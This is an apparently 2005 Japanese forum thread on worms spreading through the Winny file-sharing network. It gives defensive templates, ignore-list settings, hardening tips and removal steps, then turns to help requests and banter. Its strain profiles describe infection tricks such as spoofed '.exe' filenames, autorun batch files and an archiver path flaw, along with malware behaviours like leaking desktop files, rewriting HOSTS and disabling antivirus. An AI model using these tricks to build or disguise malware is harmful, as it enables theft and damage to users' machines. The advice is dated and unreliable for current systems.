Winnyを狙ったワーム・ニュイルス情報 Part34

このエントリーをはてなブックマークに追加
1[名無し]さん(bin+cue).rar
        『旧型お断り』
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行させる

■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。

前スレ
Winnyを狙ったワーム・ウイルス情報 Part33
http://tmp4.2ch.net/test/read.cgi/download/1107015489/

テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
2[名無し]さん(bin+cue).rar:05/02/20 22:17:18 ID:6EgP222R0
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【使用AntiVirusソフト】
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンしたなら結果】
【Winnyのバージョン】
【Winny歴、総DL量】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状、具体的に分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
3[名無し]さん(bin+cue).rar:05/02/20 22:19:24 ID:6EgP222R0
■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
4[名無し]さん(bin+cue).rar:05/02/20 22:20:49 ID:6EgP222R0
■感染しないための注意1 〜予めやっておくべき設定〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく。(詳しくは別記)
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 また怪しいと思ったらwhiterVBS簡易チェッカーで調べてみる。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ

表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
 にあるFlagsの値を10進数で1に変更する。
・アイコン偽装したexeを見分けるため、
 フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス

権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。
5[名無し]さん(bin+cue).rar:05/02/20 22:21:06 ID:FUdQYeD40































終了〜じゃ〜
6[名無し]さん(bin+cue).rar:05/02/20 22:22:33 ID:6EgP222R0
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・exeファイルの実行は完全自己責任、転んでも泣かない。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://winny.serveftp.com/nydb/top.php

※CD/DVDドライブのAutorunの切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
  2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
7[名無し]さん(bin+cue).rar:05/02/20 22:27:23 ID:6EgP222R0
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」

■まとめサイト
 ttp://myui.s53.xrea.com/kin/index.html
■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
 ttp://www.geocities.jp/ichigo_kintama/
8[名無し]さん(bin+cue).rar:05/02/20 22:27:58 ID:ZY68iAK30
ニュイルス乙
9[名無し]さん(bin+cue).rar:05/02/20 22:29:09 ID:XsnDfPFA0
★流行種その2
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■主な症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 ※Systemフォルダにあるsvchost.exeは問題ありません。
・UpFolder.txtにBBSという名前でダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。
 親はms???.exe(282k)、子はms???.exe(248k)。
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■駆除方法
1.親のファイル名が含まれるレジストリキーを削除。
 Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
 (Win9x、MEの場合は不明)
2.セーフモードで再起動し、ファイルを親子ともども削除。
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4.NyのUpフォルダ設定を元に戻す。
5.ノートンやバスター等のワクチンソフトを再インストール。
 バスターはPCCTool.exeを使えば再インストールせずに済む。
10手伝う:05/02/20 22:29:50 ID:XsnDfPFA0
★流行種その3
【Autorun+batを利用したウイルス】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■主な活動内容(種類により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動する毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。
・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。
■駆除方法(種類により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
11[名無し]さん(bin+cue).rar:05/02/20 22:31:01 ID:XsnDfPFA0
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
■感染ルート
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。
■主な症状(感染確認方法)
・ny起動すると画面が真っ黒になり、
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャが起動できない。
■主な活動内容
・C:\WINNT\Web\Wallpaperのフォルダを開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか(3つ?)作る。
 ファイル名はシステムに使用されるものをランダムに使用する模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下の値も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■駆除方法
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで追加されたキーを削除。
12[名無し]さん(bin+cue).rar:05/02/20 22:31:39 ID:XsnDfPFA0
★流行種その5
【仙台キンタマ(W32.SillyP2P)】
■感染ルート
・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。
■主な活動内容
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
 Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
 downフォルダ内のファイル一覧のtxt、デスクトップSS、
 Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。

【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。
・ノートンはAntinny.Gとして緊急対策。
13[名無し]さん(bin+cue).rar:05/02/20 22:32:19 ID:XsnDfPFA0
過去スレ 1
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
14[名無し]さん(bin+cue).rar:05/02/20 22:32:54 ID:NbZ7w5SA0
ニュイルスきたー
おつー
15ラスト:05/02/20 22:33:14 ID:XsnDfPFA0
16[名無し]さん(bin+cue).rar:05/02/20 22:33:58 ID:HKtlrBoV0
オツ
17[名無し]さん(bin+cue).rar:05/02/20 22:34:23 ID:XsnDfPFA0
30秒規制uzee(ry

>>1 乙乙
18[名無し]さん(bin+cue).rar:05/02/20 22:42:09 ID:feHJs4sn0
にゅいにゅい、おつ
19[名無し]さん(bin+cue).rar:05/02/20 22:50:12 ID:rh5zqfB90



でも ニャーム・ニュイルス なら更に良かったw
20[名無し]さん(bin+cue).rar:05/02/20 22:58:55 ID:feHJs4sn0
ウイルスがかわいらしく感じるな

鳴き声がニュイニュイ。
21[名無し]さん(bin+cue).rar:05/02/20 23:08:15 ID:qZ5GfCXe0
ワラタ>ニュイルス
22[名無し]さん(bin+cue).rar:05/02/20 23:10:45 ID:0GbOKjpF0
本当にニュイルスで建てやがってwwwおつ
23[名無し]さん(bin+cue).rar:05/02/20 23:24:57 ID:Qlh5k0ZM0
『まず、ここは初心者の質問・救済スレではありません。』
『まず、ここは初心者の質問・救済スレではありません。』
『まず、ここは初心者の質問・救済スレではありません。』
24[名無し]さん(bin+cue).rar:05/02/20 23:34:45 ID:vzk0vLui0

        _,,. -ー-- ..、
      ,.::'-- 、-- ★.  ヽ、
   , -''/;' r:::, lー-、, =、 ヽ  , - 、
  /  /~ヽ`"_ノ  ;' γヽ }ヽ l /   )        >>1
  l  !   ̄   、 `ー'' ノ l lノ!_.ノrっ-、    < 乙です
  ヽ  !       `'''''"ヽ l l Lブ├'~
    `(ヽ  `i入_,     .l/  l '__.ノ
     〉 ト、 し' ,.. - 、_,.ノ~ /‐'~
    / ノ-''"`/  r''/ー―'"
    `'''"   l ノ‐'
         `"
25[名無し]さん(bin+cue).rar:05/02/20 23:59:16 ID:1pUDGUTm0
>>1乙鰈

ニュイルス(・∀・)イイ!
26[名無し]さん(bin+cue).rar:05/02/21 00:19:34 ID:d7LkbmfD0
新しい2ch語誕生の予感 ニュイルス
27[名無し]さん(bin+cue).rar:05/02/21 00:21:27 ID:YhVXu7wI0
ニャーム・ニュイルスっつー単語自体はこのスレで随分前に出たんだけどな。
その頃スレタイに入れようって話もあったんだが、結局立ち消えになってた。

実際に入れて見せた>>1は神
注意書きが『旧型お断り』に変わっちゃってるけどな
28[名無し]さん(bin+cue).rar:05/02/21 01:17:34 ID:4e946IMc0
いわゆるゴット
29[名無し]さん(bin+cue).rar:05/02/21 06:21:49 ID:U24+gjSV0
ゴット級なのマダァ?
30[名無し]さん(bin+cue).rar:05/02/21 06:39:29 ID:lIssnys80
しばし待て。
31[名無し]さん(bin+cue).rar:05/02/21 07:22:20 ID:VtZM6/4X0
みつおぬるぽに感染してから数日たったけどなんにもないな
遅効性ウィルスなのか 
遅効性ウィルスと見せかけて実は単なるデスクトップ変える程度のウィルスの亜種だったのか

引き続き様子を見るぽ
32[名無し]さん(bin+cue).rar:05/02/21 07:33:23 ID:v0tHpKGs0
「二択」のリソースは
BMP壁紙:まだ懲りないの?.bmp
アイコン:Winrarのもの

ニセUNLHA32.DLL機能は搭載してない
33[名無し]さん(bin+cue).rar:05/02/21 07:47:20 ID:zhi5a5j70
みつをぬるぽに時限発動するウィルスが仕掛けられてると思うかえ?
34[名無し]さん(bin+cue).rar:05/02/21 11:53:38 ID:IUFq7EYo0
どうでしょう。
35[名無し]さん(bin+cue).rar:05/02/21 15:36:44 ID:bocdVpNs0
スロット覚えたてで、初めてコインをカウンターに
流そうとしたとき、場所がわからずパチンコのシマに
きてしまった。で、パチンコのカウンターにコインを
流してしまった・・・
その後、店員がピンセットみたいなもので1枚づつコインを
カウンターから取り除いていたが、
「おまえわざとか?」とかイヤミを言われた。
オレはぜんぜん悪くないのに、イヤミを言われてアタッマきた。
36[名無し]さん(bin+cue).rar:05/02/21 15:59:39 ID:6KjgU+wq0
余裕ぶっこいてんの、ウィルス作者だろ
37[名無し]さん(bin+cue).rar:05/02/21 16:14:09 ID:GpAZYg3H0
【使用OS】WindowsXP
【WindowsUpdateしてるか】していません
【使用AntiVirusソフト】ウィルスバスター2005
【AntiVirusをUpdateしてるか】していません
【ウイルススキャンの結果】わかりません
【オンラインスキャンしたなら結果】
【Winnyのバージョン】v2,0 b7.1
【Winny歴、総DL量】3ヶ月くらいです。
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】どの対策をとればいいのかわかりません
【症状、具体的に分かる限りすべて書く】キャッシュがパソコンを再起動すると勝手に消えています。
それと、今まではほとんどでなかったUPフォルダがでてきます。中身は、DLしたものの名前がつくものです。
【何をしたらそんなことになったのか】わかりません
【これまでにとった措置】何もしていません
どうすれば直りますか?
ご指導よろしくお願いします
38[名無し]さん(bin+cue).rar:05/02/21 16:26:36 ID:AroLEB+g0
>>35
そうだな。お前の頭が悪いだけだもんな。

>>37
テンプレ読んで理解できないなら、初期化と新規インストールしか
ないよ。
39[名無し]さん(bin+cue).rar:05/02/21 16:28:25 ID:sfJM/B2p0
キャッシュ消される件は対策も何もないな
患者からの提供情報が全然足りない
40[名無し]さん(bin+cue).rar:05/02/21 16:43:40 ID:2JP3KMYC0
>>38
コピペにマジレス( ´,_ゝ`)プッ
41[名無し]さん(bin+cue).rar:05/02/21 16:58:44 ID:QFegAMlH0
  そんな釣りで俺様がクマーー!!      ,,_
\                          r'o p。`、
  \                        l  ,.- 、ヾ       r' `ー- 、
   \                       l '-‐‐-' ,'       ' ,   .;;.`l
     \                     ',    j         ,i' ,,  '' l
      \                     〉    k       , '     ,ノ
        \                   ,'     ',      , '     ,'
         \                7      l     , '      ,'
           \              ,'      ,'    , '      ,'
            \   ,, ,.-‐--.,,__ ,'     , , ' 、  ,'         ,'
              \r''"´      ,  `   '"    `'、       ,'
              (´⌒qヽ    , '                   ,'
                ,、n_ノ    , '  _r-‐- 、             l'
               ' 、    _, ' ., r-' _,-‐q i             ,'
            ,.‐-、_,,ソー'´  , ; 、_γ  l       ,      ,'
          r‐'´g ri ::     ,'  '、  r_,  'l     :´ `ヾ   ,.'
          `、 r, i | :     ' ,   ` 、   j     '       , '
           t、o_ tj ::       ' ,  、`ー--,'.:        _,ノ
            `ー-‐'´ `ー----‐'"`ー、`____;'-、     ,-'
                               `゛"''''''"
42[名無し]さん(bin+cue).rar:05/02/21 17:06:21 ID:Pn0ZKzpg0
ジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカジャンカーン
43[名無し]さん(bin+cue).rar:05/02/21 17:25:57 ID:ahQ2pSOx0
>>36
逆に余裕が無い奴等ってexeとかbatとか無警戒に踏むバカだろ?
44[名無し]さん(bin+cue).rar:05/02/21 17:29:01 ID:2JP3KMYC0
.exe(笑)
45[名無し]さん(bin+cue).rar:05/02/21 17:32:58 ID:NBn7Flgf0
ワタリがどうなるのか気になり、つい慌ててクリックした。今は反省している。
46[名無し]さん(bin+cue).rar:05/02/21 18:23:43 ID:IZ+J/wwS0
デスノのexe踏む奴はキラにやられるな。
47[名無し]さん(bin+cue).rar:05/02/21 18:28:35 ID:Mo6AciCQ0
デスノ3月いっぱいで終了らしいよ
48[名無し]さん(bin+cue).rar:05/02/21 21:24:14 ID:q/Rc599/0
ネットで不審者の動きを封じ込める防犯機具「ネットランチャー」が注目集める
http://headlines.yahoo.co.jp/videonews/fnn/20050221/20050221-00000461-fnn-soci.html

なんか釣られた気分になった
49[名無し]さん(bin+cue).rar:05/02/21 21:36:49 ID:1D6J8wd00
>>48
そっちのネットか(笑)
50[名無し]さん(bin+cue).rar:05/02/21 21:37:52 ID:AroLEB+g0
>>48
ニュースで見たけど、単なる網にそれほど制圧効果があるのかな?
網の結び目ひとつひとつに返し付きの針を仕込むとか、瞬間接着剤
入りのカプセルを編み込んでおくくらいしないとな。
51[名無し]さん(bin+cue).rar:05/02/21 21:42:18 ID:XpaR076N0
ネットランチャーってところも某雑誌を思い出させるな

>>50
接着剤は後始末が大変だと進士さんが証明してた
52[名無し]さん(bin+cue).rar:05/02/21 21:51:44 ID:AroLEB+g0
>>51
あれは混合時にラリッたのが原因ジャマイカ。(w
53[名無し]さん(bin+cue).rar:05/02/21 23:15:26 ID:wToehF5t0
>>50
結局デスク壊しちゃったよな、はがれなくて。
54[名無し]さん(bin+cue).rar:05/02/21 23:47:59 ID:KPVMDDXl0
taskmgr復活する方法教えてください。
55[名無し]さん(bin+cue).rar:05/02/22 00:52:18 ID:sfPkrBt/0
>>54
再インスコ
56[名無し]さん(bin+cue).rar:05/02/22 11:48:04 ID:IPzSWfzf0
未だにHDD消去に会ったことがないんですけど、それって
アンチウイルスソフトで検出してくれないんですか?
57[名無し]さん(bin+cue).rar:05/02/22 11:49:27 ID:z7jnLeXf0
俺も会ったこと無いけど、そうらしいよ
58[名無し]さん(bin+cue).rar:05/02/22 11:51:24 ID:e/CcM6Va0
俺、会ったこと有るけど、説得したら帰っていったよ
59[名無し]さん(bin+cue).rar:05/02/22 11:57:46 ID:S2MFw4s+0
>>56
ウイルスじゃないから無理
60[名無し]さん(bin+cue).rar:05/02/22 12:45:12 ID:EdDnWPz50
ウィルスソフトで
警告くらい出してほしいもんだ
61[名無し]さん(bin+cue).rar:05/02/22 12:57:58 ID:gh+7+vr+0
テンプレに掲げられてるような指名手配クラスの
古株HDD消去プログラム(Whiter)なら
アンチウィルスソフトが何とかしてくれるがな
62[名無し]さん(bin+cue).rar:05/02/22 13:15:54 ID:A2h4QrlX0
偽装解除.batはデスクトップ画像
晒したりは無い…?不安だ。
63[名無し]さん(bin+cue).rar:05/02/22 16:03:27 ID:yKt2uVqP0
午後10時、友人O、我が家へ来る→俺のPCでゲームをしはじめるwinny2起動
午前3時 ゲーム中に女性の悲鳴→画面がだんだん血痕で埋まっていき、
    ぬるぽ と文字がうすく浮かび上がってくる
    ぬるぽニュイルスと判断→対処→winny再インスコ ・・・('A`;)
先生によるとW32.antinnyだた キンタマか( ´,_ゝ`)ちくせう 愚痴スマン
64[名無し]さん(bin+cue).rar:05/02/22 16:08:12 ID:GYcbRHwj0
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
6563の友人:05/02/22 16:18:33 ID:oTAdL3Lx0
ニヤニヤ
66[名無し]さん(bin+cue).rar:05/02/22 16:38:22 ID:yKt2uVqP0
ノートン先生がただいま孤軍奮闘中でございます
戦況: ニュ46VS1先生
67[名無し]さん(bin+cue).rar:05/02/22 17:17:39 ID:UI5Raoid0
ルーター外してネットしてみたけど、いまだにMS Blastに感染している奴が居るんだな
68[名無し]さん(bin+cue).rar:05/02/22 22:48:42 ID:yKt2uVqP0
JPEG画像が見れなくなった&絵描き掲示板などに書き込み不可能
という後遺症が('A`;)
まだJPEG系統が汚染されたままなのか先生。
69[名無し]さん(bin+cue).rar:05/02/22 22:51:57 ID:7XJdVXTO0
おぉ迷える子羊よ
そのような穢れた身体は捨てなさい
穢れ無き魂のみで生きるのです

だからPCを窓から投げ捨てろ
70[名無し]さん(bin+cue).rar:05/02/22 22:57:18 ID:yKt2uVqP0
すまん捨てようとしたが手がくっついて離れないんだ
71[名無し]さん(bin+cue).rar:05/02/22 22:59:54 ID:sFa4IwKJ0
【使用OS】WindowsXP
【WindowsUpdateしてるか】しています
【使用AntiVirusソフト】ウィルスセキュリティ
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】感染なしです
【オンラインスキャンしたなら結果】
【Winnyのバージョン】v2,0 b7.1
【Winny歴、総DL量】2日、びびって消しました。
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】どの対策をとればいいのかわかりません
【症状、具体的に分かる限りすべて書く】パソコンを起動させるたびにプログラムファイル内のどこかに
exeファイルが作成され、勝手に外部と連絡してしまった。
【何をしたらそんなことになったのか】 exeファイルを開いてしまった。
【これまでにとった措置】何もしていいかわかりません
どうすれば直りますか?
ご指導よろしくお願いします

72[名無し]さん(bin+cue).rar:05/02/22 23:04:59 ID:iKRL0jUy0
>どの対策をとればいいのかわかりません

そりゃ誰にもわからんがな
まず全部試すべし
73[名無し]さん(bin+cue).rar:05/02/22 23:06:21 ID:0zrjGSlp0
>71
勝手に外部と連絡してしまった。
ヤバくね?
74[名無し]さん(bin+cue).rar:05/02/22 23:15:44 ID:gh+7+vr+0
連絡って何だろう?電話?メール?うp?
つり?
75[名無し]さん(bin+cue).rar:05/02/22 23:17:28 ID:tgkcxVVp0
>>71
おーのーだズラ。おまいもうだめだズラ。
76[名無し]さん(bin+cue).rar:05/02/22 23:17:57 ID:PI4jwCgy0
糸電話だろ
77[名無し]さん(bin+cue).rar:05/02/22 23:18:23 ID:mFEDw+b80
飛脚だろ
78[名無し]さん(bin+cue).rar:05/02/22 23:22:08 ID:yKt2uVqP0
>>65
が全て解決してくれるに違いない
しかしキンタマにJPEG改変なんて機能あるのか('A`;)
わからなーい_| ̄|○
7971:05/02/22 23:23:55 ID:sFa4IwKJ0
いや、ウィルスソフトが外部と連絡していますよと警告してくれたので、
ちなみにその勝手にできる実行ファイルを開いたら、なんかアニメ絵の
おねえちゃんのGIF画像が開きました。
80[名無し]さん(bin+cue).rar:05/02/22 23:31:43 ID:SbP4gPzC0
平和だねぇ
81[名無し]さん(bin+cue).rar:05/02/22 23:35:08 ID:CpF2oBil0
82[名無し]さん(bin+cue).rar:05/02/22 23:36:50 ID:j7zvyp750
>>79
で、なんでまたそこでわけのわかんねファイル開くんだよw
もうOS再インスコしなよ、いい勉強になっただろ。
83[名無し]さん(bin+cue).rar:05/02/22 23:38:13 ID:mFEDw+b80
>>79
>>3を実行しておけ
84[名無し]さん(bin+cue).rar:05/02/22 23:43:58 ID:3gIbuX9P0
>71
とりあえず、
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp
ここで反応が無かった場合のみ、落としたファイルを用意してから戻ってこい
85[名無し]さん(bin+cue).rar:05/02/23 00:18:57 ID:kiUZW5Ii0
【使用OS】WindowsXP
【WindowsUpdateしてるか】しています
【使用AntiVirusソフト】ノートンアンチウィルスバスター
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】感染あり
【オンラインスキャンしたなら結果】 感染あり
【Winnyのバージョン】v2,0 b7.1
【Winny歴、総DL量】2週間 ALL消去
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】解る範囲ですが行いました
【症状、具体的に分かる限りすべて書く】ウィルス混入と同時に発生したパソコン内のJPEG
ファイルが全て閲覧出来ないという症状が改変されない。ネットの絵描き掲示板なども描こうとしても
